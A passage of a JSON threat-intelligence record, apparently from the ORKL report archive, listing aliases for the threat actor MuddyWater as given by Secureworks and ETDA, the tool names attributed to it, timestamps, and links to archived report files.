				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434892,
	"ts_updated_at": 1775826722,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/35d8864336f82a2732edd20ce9e5d9d70bbebc0c.pdf",
		"text": "https://archive.orkl.eu/35d8864336f82a2732edd20ce9e5d9d70bbebc0c.txt",
		"img": "https://archive.orkl.eu/35d8864336f82a2732edd20ce9e5d9d70bbebc0c.jpg"
	}
}